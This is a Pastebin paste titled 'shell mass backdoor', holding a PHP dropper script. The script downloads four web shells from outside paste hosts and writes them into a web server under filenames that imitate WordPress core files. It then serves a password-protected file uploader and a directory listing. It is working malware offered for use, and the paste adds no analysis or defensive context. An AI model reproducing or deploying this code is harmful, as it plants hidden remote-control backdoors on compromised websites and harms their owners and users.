API tools faq
paste
Advertisement
alien2002

shell mass backdoor

alien2002
Apr 25th, 2020
993
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.29 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. $server = $_SERVER['HTTP_HOST'];
  3. @ini_set('output_buffering', 0);
  4. @ini_set('display_errors', 0);
  5. set_time_limit(0);
  6. ini_set('memory_limit', '64M');
  7. header('Content-Type: text/html; charset=UTF-8');
  8. function http_get($url){
  9. $im = curl_init($url);
  10. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  11. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  12. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  13. curl_setopt($im, CURLOPT_HEADER, 0);
  14. return curl_exec($im);
  15. curl_close($im);
  16. }
  17. $check1 = $_SERVER['DOCUMENT_ROOT'] . "/wp-config-samsples.php" ;
  18. $text1 = http_get('https://pastebin.com/raw/WVUjGABA'); //main shell
  19. $open1 = fopen($check1, 'w');
  20. fwrite($open1, $text1);
  21. fclose($open1);
  22. if(file_exists($check1)){
  23. }
  24. echo " Stored : <a href=\"http://".$_SERVER['HTTP_HOST']."/wp-config-samsples.php\">".$_SERVER['HTTP_HOST']."/wp-config-samsples.php</a>\n<br>";
  25. $check2 = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/themes/class-wp-filesystemss.php" ;
  26. $text2 = http_get('http://3e593e21dae5bb3d.paste.se/raw'); //mini shell
  27. $open2 = fopen($check2, 'w');
  28. fwrite($open2, $text2);
  29. fclose($open2);
  30. if(file_exists($check2)){
  31. }
  32. echo " Stored : <a href=\"http://".$_SERVER['HTTP_HOST']."/wp-content/themes/class-wp-filesystemss.php\">".$_SERVER['HTTP_HOST']."/wp-content/themes/class-wp-filesystemss.php </a>\n<br>";
  33. $check3 = $_SERVER['DOCUMENT_ROOT'] . "/wp-admin/user/class-wp-filesystem.php" ;
  34. $text3 = http_get('http://a0bfe5a1cc734e0f.paste.se/raw'); //wso shell
  35. $open3 = fopen($check3, 'w');
  36. fwrite($open3, $text3);
  37. fclose($open3);
  38. if(file_exists($check3)){
  39. }
  40. echo " Stored : <a href=\"http://".$_SERVER['HTTP_HOST']."/wp-admin/user/class-wp-filesystem.php\">".$_SERVER['HTTP_HOST']."/wp-admin/user/class-wp-filesystem.php </a>\n<br>";
  41. $check4 = $_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css/class-wp.php" ;
  42. $text4 = http_get('http://c65f10a1973cf6d8.paste.se/raw'); //xleet shell
  43. $open4 = fopen($check4, 'w');
  44. fwrite($open4, $text4);
  45. fclose($open4);
  46. if(file_exists($check4)){
  47. }
  48. echo " Stored : <a href=\"http://".$_SERVER['HTTP_HOST']."/wp-admin/css/class-wp.php\">".$_SERVER['HTTP_HOST']."/wp-admin/css/class-wp.php </a>\n<br>";
  49.  
  50. ?>
  51. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  52. <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256" /></head><body>
  53. <?php
  54. if (!empty($_GET['action']) && $_GET['action'] == "logout") {session_destroy();unset ($_SESSION['pass']);}
  55.  
  56. $path_name = pathinfo($_SERVER['PHP_SELF']);
  57. $this_script = $path_name['basename'];
  58. if (empty($_SESSION['pass'])) {$_SESSION['pass']='';}
  59. if (empty($_POST['pass'])) {$_POST['pass']='';}
  60. if ( $_SESSION['pass']!== $pass)
  61. {
  62. if ($_POST['pass'] == $pass) {$_SESSION['pass'] = $pass; }
  63. else
  64. {
  65. echo '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><input name="pass" type="password"><input type="submit"></form>';
  66. exit;
  67. }
  68. }
  69. ?>
  70.  
  71.  
  72. <form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
  73. File mu mas : <input name="file" type="file" /><br />
  74. <input type="submit" value="Upload" /></form>
  75.  
  76.  
  77. <?php
  78.  
  79. if (!empty($_FILES["file"]))
  80. {
  81. if ($_FILES["file"]["error"] > 0)
  82. {echo "Error: " . $_FILES["file"]["error"] . "<br>";}
  83. else
  84. {echo "Stored file:".$_FILES["file"]["name"]."<br/>Size:".($_FILES["file"]["size"]/1024)." kB<br/>";
  85. move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);
  86. }
  87. }
  88.  
  89. // open this directory
  90. $myDirectory = opendir(".");
  91. // get each entry
  92. while($entryName = readdir($myDirectory)) {$dirArray[] = $entryName;} closedir($myDirectory);
  93. $indexCount = count($dirArray);
  94. echo "$indexCount files<br/>";
  95. sort($dirArray);
  96.  
  97. echo "<TABLE border=1 cellpadding=5 cellspacing=0 class=whitelinks><TR><TH>Filename</TH><th>Filetype</th><th>Filesize</th></TR>\n";
  98.  
  99. for($index=0; $index < $indexCount; $index++)
  100. {
  101. if (substr("$dirArray[$index]", 0, 1) != ".")
  102. {
  103. echo "<TR>
  104. <td><a href=\"$dirArray[$index]\">$dirArray[$index]</a></td>
  105. <td>".filetype($dirArray[$index])."</td>
  106. <td>".filesize($dirArray[$index])."</td>
  107. </TR>";
  108. }
  109. }
  110. echo "</TABLE>";
  111. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!